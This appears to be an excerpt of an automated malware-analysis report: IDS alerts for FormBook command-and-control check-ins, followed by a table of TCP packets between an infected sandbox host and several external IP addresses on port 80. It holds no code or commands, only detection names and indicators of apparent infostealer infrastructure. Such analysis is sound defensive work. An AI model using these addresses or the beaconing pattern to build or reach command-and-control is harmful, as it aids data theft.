2024-11-04T10:12:59.961740+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50036	3.33.130.190	80	TCP
2024-11-04T10:13:03.418080+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50037	3.33.130.190	80	TCP
2024-11-04T10:13:12.177218+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50038	3.33.130.190	80	TCP
2024-11-04T10:13:12.177218+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50038	3.33.130.190	80	TCP
2024-11-04T10:13:17.958577+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50039	199.59.243.227	80	TCP
2024-11-04T10:13:20.518298+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50040	199.59.243.227	80	TCP
2024-11-04T10:13:23.439968+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50041	199.59.243.227	80	TCP
2024-11-04T10:13:26.300452+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50042	199.59.243.227	80	TCP
2024-11-04T10:13:26.300452+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50042	199.59.243.227	80	TCP
2024-11-04T10:13:32.386564+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50043	217.160.0.111	80	TCP
2024-11-04T10:13:34.981741+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50044	217.160.0.111	80	TCP
2024-11-04T10:13:37.485727+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50045	217.160.0.111	80	TCP
2024-11-04T10:13:39.985829+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50046	217.160.0.111	80	TCP
2024-11-04T10:13:39.985829+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50046	217.160.0.111	80	TCP
2024-11-04T10:13:46.766436+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50047	168.76.221.252	80	TCP
2024-11-04T10:13:49.305846+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50048	168.76.221.252	80	TCP
2024-11-04T10:13:51.683850+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50049	168.76.221.252	80	TCP
2024-11-04T10:13:54.517791+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50050	168.76.221.252	80	TCP
2024-11-04T10:13:54.517791+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50050	168.76.221.252	80	TCP
2024-11-04T10:14:00.641081+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50051	185.179.189.193	80	TCP
2024-11-04T10:14:03.717669+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50052	185.179.189.193	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 4, 2024 10:10:50.330051899 CET	49736	80	192.168.2.4	195.154.200.15
Nov 4, 2024 10:10:50.335238934 CET	80	49736	195.154.200.15	192.168.2.4
Nov 4, 2024 10:10:50.335333109 CET	49736	80	192.168.2.4	195.154.200.15
Nov 4, 2024 10:10:50.343189001 CET	49736	80	192.168.2.4	195.154.200.15
Nov 4, 2024 10:10:50.348062038 CET	80	49736	195.154.200.15	192.168.2.4
Nov 4, 2024 10:10:51.878318071 CET	80	49736	195.154.200.15	192.168.2.4
Nov 4, 2024 10:10:51.878428936 CET	80	49736	195.154.200.15	192.168.2.4
Nov 4, 2024 10:10:51.878536940 CET	49736	80	192.168.2.4	195.154.200.15
Nov 4, 2024 10:10:51.989078999 CET	80	49736	195.154.200.15	192.168.2.4
Nov 4, 2024 10:10:51.989195108 CET	49736	80	192.168.2.4	195.154.200.15
Nov 4, 2024 10:10:51.992472887 CET	49736	80	192.168.2.4	195.154.200.15
Nov 4, 2024 10:10:51.997287989 CET	80	49736	195.154.200.15	192.168.2.4
Nov 4, 2024 10:11:07.105916977 CET	49789	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:11:07.110855103 CET	80	49789	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:07.110938072 CET	49789	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:11:07.122508049 CET	49789	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:11:07.127355099 CET	80	49789	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:07.738226891 CET	80	49789	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:07.738344908 CET	80	49789	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:07.738394022 CET	49789	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:11:07.739013910 CET	80	49789	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:07.739162922 CET	49789	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:11:08.639290094 CET	49789	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:11:09.655597925 CET	49805	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:11:09.661212921 CET	80	49805	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:09.661382914 CET	49805	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:11:09.673387051 CET	49805	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:11:09.678850889 CET	80	49805	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:10.289351940 CET	80	49805	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:10.289648056 CET	80	49805	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:10.289722919 CET	49805	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:11:10.289786100 CET	80	49805	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:10.289829969 CET	49805	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:11:11.216783047 CET	49805	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:11:12.240969896 CET	49820	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:11:12.246649981 CET	80	49820	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:12.246747971 CET	49820	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:11:12.258321047 CET	49820	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:11:12.263596058 CET	80	49820	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:12.263607979 CET	80	49820	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:12.263642073 CET	80	49820	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:12.263652086 CET	80	49820	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:12.263689041 CET	80	49820	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:12.263698101 CET	80	49820	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:12.263746977 CET	80	49820	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:12.263756037 CET	80	49820	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:12.264189005 CET	80	49820	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:12.913022041 CET	80	49820	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:12.913151979 CET	80	49820	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:12.913203001 CET	49820	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:11:12.913371086 CET	80	49820	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:12.913428068 CET	49820	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:11:13.761296988 CET	49820	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:11:14.780360937 CET	49836	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:11:14.785319090 CET	80	49836	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:14.785398006 CET	49836	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:11:14.793687105 CET	49836	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:11:14.798666954 CET	80	49836	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:15.422292948 CET	80	49836	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:15.422429085 CET	80	49836	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:15.422528982 CET	49836	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:11:15.422786951 CET	80	49836	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:15.422837019 CET	49836	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:11:15.425203085 CET	49836	80	192.168.2.4	199.59.243.227
Nov 4, 2024 10:11:15.430062056 CET	80	49836	199.59.243.227	192.168.2.4
Nov 4, 2024 10:11:20.535512924 CET	49870	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:20.540678024 CET	80	49870	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:20.540802956 CET	49870	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:20.552159071 CET	49870	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:20.557219028 CET	80	49870	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:21.224293947 CET	80	49870	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:21.224405050 CET	80	49870	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:21.224442005 CET	49870	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:21.224684000 CET	80	49870	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:21.224695921 CET	80	49870	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:21.224742889 CET	49870	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:21.225094080 CET	80	49870	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:21.261717081 CET	80	49870	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:21.261780024 CET	49870	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:22.058303118 CET	49870	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:23.076833963 CET	49884	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:23.081830025 CET	80	49884	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:23.081892967 CET	49884	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:23.093401909 CET	49884	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:23.098373890 CET	80	49884	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:23.749346018 CET	80	49884	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:23.749455929 CET	80	49884	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:23.749468088 CET	80	49884	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:23.749538898 CET	49884	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:23.749836922 CET	80	49884	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:23.749850988 CET	80	49884	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:23.749861956 CET	80	49884	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:23.749886036 CET	49884	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:23.749907970 CET	49884	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:23.789032936 CET	80	49884	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:23.789098978 CET	49884	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:24.605129957 CET	49884	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:25.623616934 CET	49900	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:25.628571987 CET	80	49900	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:25.628736973 CET	49900	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:25.646097898 CET	49900	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:25.651053905 CET	80	49900	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:25.651087999 CET	80	49900	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:25.651099920 CET	80	49900	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:25.651110888 CET	80	49900	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:25.651118994 CET	80	49900	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:25.651129961 CET	80	49900	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:25.651205063 CET	80	49900	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:25.651216030 CET	80	49900	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:25.651247025 CET	80	49900	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:26.346781969 CET	80	49900	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:26.346915960 CET	80	49900	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:26.346925974 CET	80	49900	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:26.346987963 CET	49900	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:26.347342968 CET	80	49900	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:26.347354889 CET	80	49900	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:26.347364902 CET	80	49900	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:26.347387075 CET	49900	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:26.347418070 CET	49900	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:26.385299921 CET	80	49900	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:26.385379076 CET	49900	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:27.151930094 CET	49900	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:28.170836926 CET	49912	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:28.175692081 CET	80	49912	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:28.175867081 CET	49912	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:28.183389902 CET	49912	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:28.188163042 CET	80	49912	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:28.863142014 CET	80	49912	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:28.863238096 CET	80	49912	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:28.863328934 CET	80	49912	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:28.863331079 CET	49912	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:28.863601923 CET	80	49912	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:28.863614082 CET	80	49912	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:28.863626003 CET	80	49912	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:28.863636971 CET	49912	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:28.863670111 CET	49912	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:28.864270926 CET	80	49912	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:28.864285946 CET	80	49912	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:28.864300966 CET	80	49912	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:28.864325047 CET	49912	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:28.864973068 CET	80	49912	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:28.865009069 CET	49912	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:28.902163982 CET	80	49912	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:28.902337074 CET	49912	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:28.903204918 CET	49912	80	192.168.2.4	162.0.215.244
Nov 4, 2024 10:11:28.908004999 CET	80	49912	162.0.215.244	192.168.2.4
Nov 4, 2024 10:11:33.935777903 CET	49940	80	192.168.2.4	104.21.3.144
Nov 4, 2024 10:11:33.940691948 CET	80	49940	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:33.940753937 CET	49940	80	192.168.2.4	104.21.3.144
Nov 4, 2024 10:11:33.951836109 CET	49940	80	192.168.2.4	104.21.3.144
Nov 4, 2024 10:11:33.956677914 CET	80	49940	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:35.035046101 CET	80	49940	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:35.035157919 CET	80	49940	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:35.035208941 CET	49940	80	192.168.2.4	104.21.3.144
Nov 4, 2024 10:11:35.036791086 CET	80	49940	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:35.036839008 CET	49940	80	192.168.2.4	104.21.3.144
Nov 4, 2024 10:11:35.464391947 CET	49940	80	192.168.2.4	104.21.3.144
Nov 4, 2024 10:11:36.483695030 CET	49953	80	192.168.2.4	104.21.3.144
Nov 4, 2024 10:11:36.488775015 CET	80	49953	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:36.488864899 CET	49953	80	192.168.2.4	104.21.3.144
Nov 4, 2024 10:11:36.500694036 CET	49953	80	192.168.2.4	104.21.3.144
Nov 4, 2024 10:11:36.505625010 CET	80	49953	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:37.604165077 CET	80	49953	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:37.604201078 CET	80	49953	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:37.604279995 CET	49953	80	192.168.2.4	104.21.3.144
Nov 4, 2024 10:11:37.605921030 CET	80	49953	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:37.605982065 CET	49953	80	192.168.2.4	104.21.3.144
Nov 4, 2024 10:11:38.011401892 CET	49953	80	192.168.2.4	104.21.3.144
Nov 4, 2024 10:11:39.030284882 CET	49965	80	192.168.2.4	104.21.3.144
Nov 4, 2024 10:11:39.035208941 CET	80	49965	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:39.036569118 CET	49965	80	192.168.2.4	104.21.3.144
Nov 4, 2024 10:11:39.048511982 CET	49965	80	192.168.2.4	104.21.3.144
Nov 4, 2024 10:11:39.053487062 CET	80	49965	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:39.053601027 CET	80	49965	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:39.053610086 CET	80	49965	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:39.053613901 CET	80	49965	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:39.053625107 CET	80	49965	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:39.053633928 CET	80	49965	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:39.053642988 CET	80	49965	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:39.053654909 CET	80	49965	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:39.053673029 CET	80	49965	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:40.092001915 CET	80	49965	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:40.092114925 CET	80	49965	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:40.092125893 CET	80	49965	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:40.092180967 CET	49965	80	192.168.2.4	104.21.3.144
Nov 4, 2024 10:11:40.094352961 CET	80	49965	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:40.094404936 CET	49965	80	192.168.2.4	104.21.3.144
Nov 4, 2024 10:11:40.558196068 CET	49965	80	192.168.2.4	104.21.3.144
Nov 4, 2024 10:11:41.585994005 CET	49978	80	192.168.2.4	104.21.3.144
Nov 4, 2024 10:11:41.594625950 CET	80	49978	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:41.594701052 CET	49978	80	192.168.2.4	104.21.3.144
Nov 4, 2024 10:11:41.607145071 CET	49978	80	192.168.2.4	104.21.3.144
Nov 4, 2024 10:11:41.629034042 CET	80	49978	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:42.714726925 CET	80	49978	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:42.714816093 CET	80	49978	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:42.714914083 CET	49978	80	192.168.2.4	104.21.3.144
Nov 4, 2024 10:11:42.716370106 CET	80	49978	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:42.716420889 CET	49978	80	192.168.2.4	104.21.3.144
Nov 4, 2024 10:11:42.717551947 CET	49978	80	192.168.2.4	104.21.3.144
Nov 4, 2024 10:11:42.722371101 CET	80	49978	104.21.3.144	192.168.2.4
Nov 4, 2024 10:11:47.760242939 CET	50008	80	192.168.2.4	76.223.67.189
Nov 4, 2024 10:11:47.765216112 CET	80	50008	76.223.67.189	192.168.2.4
Nov 4, 2024 10:11:47.765295982 CET	50008	80	192.168.2.4	76.223.67.189
Nov 4, 2024 10:11:47.778816938 CET	50008	80	192.168.2.4	76.223.67.189
Nov 4, 2024 10:11:47.783658028 CET	80	50008	76.223.67.189	192.168.2.4
Nov 4, 2024 10:11:49.292598963 CET	50008	80	192.168.2.4	76.223.67.189
Nov 4, 2024 10:11:49.297919989 CET	80	50008	76.223.67.189	192.168.2.4
Nov 4, 2024 10:11:49.298150063 CET	50008	80	192.168.2.4	76.223.67.189
Nov 4, 2024 10:11:50.341156960 CET	50016	80	192.168.2.4	76.223.67.189
Nov 4, 2024 10:11:50.346281052 CET	80	50016	76.223.67.189	192.168.2.4
Nov 4, 2024 10:11:50.346353054 CET	50016	80	192.168.2.4	76.223.67.189
Nov 4, 2024 10:11:50.496211052 CET	50016	80	192.168.2.4	76.223.67.189
Nov 4, 2024 10:11:50.501029968 CET	80	50016	76.223.67.189	192.168.2.4
Nov 4, 2024 10:11:50.971041918 CET	80	50016	76.223.67.189	192.168.2.4
Nov 4, 2024 10:11:50.971333981 CET	50016	80	192.168.2.4	76.223.67.189
Nov 4, 2024 10:11:52.011357069 CET	50016	80	192.168.2.4	76.223.67.189
Nov 4, 2024 10:11:52.016645908 CET	80	50016	76.223.67.189	192.168.2.4
Nov 4, 2024 10:11:53.045140982 CET	50017	80	192.168.2.4	76.223.67.189
Nov 4, 2024 10:11:53.051217079 CET	80	50017	76.223.67.189	192.168.2.4
Nov 4, 2024 10:11:53.051414013 CET	50017	80	192.168.2.4	76.223.67.189
Nov 4, 2024 10:11:53.069380045 CET	50017	80	192.168.2.4	76.223.67.189
Nov 4, 2024 10:11:53.074259996 CET	80	50017	76.223.67.189	192.168.2.4
Nov 4, 2024 10:11:53.074265957 CET	80	50017	76.223.67.189	192.168.2.4
Nov 4, 2024 10:11:53.074285030 CET	80	50017	76.223.67.189	192.168.2.4
Nov 4, 2024 10:11:53.074301004 CET	80	50017	76.223.67.189	192.168.2.4
Nov 4, 2024 10:11:53.074316025 CET	80	50017	76.223.67.189	192.168.2.4
Nov 4, 2024 10:11:53.074326992 CET	80	50017	76.223.67.189	192.168.2.4
Nov 4, 2024 10:11:53.074333906 CET	80	50017	76.223.67.189	192.168.2.4
Nov 4, 2024 10:11:53.074455023 CET	80	50017	76.223.67.189	192.168.2.4
Nov 4, 2024 10:11:53.074459076 CET	80	50017	76.223.67.189	192.168.2.4
Nov 4, 2024 10:11:54.574029922 CET	50017	80	192.168.2.4	76.223.67.189
Nov 4, 2024 10:11:54.579346895 CET	80	50017	76.223.67.189	192.168.2.4
Nov 4, 2024 10:11:54.579399109 CET	50017	80	192.168.2.4	76.223.67.189
Nov 4, 2024 10:11:55.597533941 CET	50018	80	192.168.2.4	76.223.67.189
Nov 4, 2024 10:11:55.602404118 CET	80	50018	76.223.67.189	192.168.2.4
Nov 4, 2024 10:11:55.603682041 CET	50018	80	192.168.2.4	76.223.67.189
Nov 4, 2024 10:11:55.611392975 CET	50018	80	192.168.2.4	76.223.67.189
Nov 4, 2024 10:11:55.632282972 CET	80	50018	76.223.67.189	192.168.2.4
Nov 4, 2024 10:11:56.260510921 CET	80	50018	76.223.67.189	192.168.2.4
Nov 4, 2024 10:11:56.260937929 CET	80	50018	76.223.67.189	192.168.2.4
Nov 4, 2024 10:11:56.260992050 CET	50018	80	192.168.2.4	76.223.67.189
Nov 4, 2024 10:11:56.263732910 CET	50018	80	192.168.2.4	76.223.67.189
Nov 4, 2024 10:11:56.268630981 CET	80	50018	76.223.67.189	192.168.2.4
Nov 4, 2024 10:12:01.298105001 CET	50019	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:01.302891970 CET	80	50019	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:01.303956985 CET	50019	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:01.315690041 CET	50019	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:01.320605040 CET	80	50019	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:02.827580929 CET	50019	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:02.832890987 CET	80	50019	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:02.833017111 CET	50019	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:03.843548059 CET	50020	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:03.848350048 CET	80	50020	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:03.848417997 CET	50020	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:03.863682985 CET	50020	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:03.868555069 CET	80	50020	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:05.370920897 CET	50020	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:05.376157999 CET	80	50020	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:05.376233101 CET	50020	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:06.394540071 CET	50021	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:06.399353027 CET	80	50021	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:06.399456978 CET	50021	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:06.411699057 CET	50021	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:06.416631937 CET	80	50021	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:06.416637897 CET	80	50021	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:06.416660070 CET	80	50021	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:06.416663885 CET	80	50021	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:06.416698933 CET	80	50021	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:06.416703939 CET	80	50021	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:06.416757107 CET	80	50021	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:06.416760921 CET	80	50021	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:06.416790962 CET	80	50021	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:07.920944929 CET	50021	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:07.926251888 CET	80	50021	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:07.926299095 CET	50021	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:08.936474085 CET	50022	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:08.941555023 CET	80	50022	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:08.945677042 CET	50022	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:08.952990055 CET	50022	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:08.957860947 CET	80	50022	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:10.520934105 CET	80	50022	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:10.521541119 CET	80	50022	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:10.521608114 CET	50022	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:10.542274952 CET	50022	80	192.168.2.4	3.33.130.190
Nov 4, 2024 10:12:10.547292948 CET	80	50022	3.33.130.190	192.168.2.4
Nov 4, 2024 10:12:15.597986937 CET	50023	80	192.168.2.4	84.32.84.32
Nov 4, 2024 10:12:15.602866888 CET	80	50023	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:15.605633974 CET	50023	80	192.168.2.4	84.32.84.32
Nov 4, 2024 10:12:15.617593050 CET	50023	80	192.168.2.4	84.32.84.32
Nov 4, 2024 10:12:15.622538090 CET	80	50023	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:16.425811052 CET	80	50023	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:16.425875902 CET	50023	80	192.168.2.4	84.32.84.32
Nov 4, 2024 10:12:17.123553991 CET	50023	80	192.168.2.4	84.32.84.32
Nov 4, 2024 10:12:17.128442049 CET	80	50023	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:18.140095949 CET	50024	80	192.168.2.4	84.32.84.32
Nov 4, 2024 10:12:18.145124912 CET	80	50024	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:18.145195961 CET	50024	80	192.168.2.4	84.32.84.32
Nov 4, 2024 10:12:18.158333063 CET	50024	80	192.168.2.4	84.32.84.32
Nov 4, 2024 10:12:18.163235903 CET	80	50024	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:18.966130972 CET	80	50024	84.32.84.32	192.168.2.4
Nov 4, 2024 10:12:18.969660044 CET	50024	80	192.168.2.4	84.32.84.32
Nov 4, 2024 10:12:19.667753935 CET	50024	80	192.168.2.4	84.32.84.32
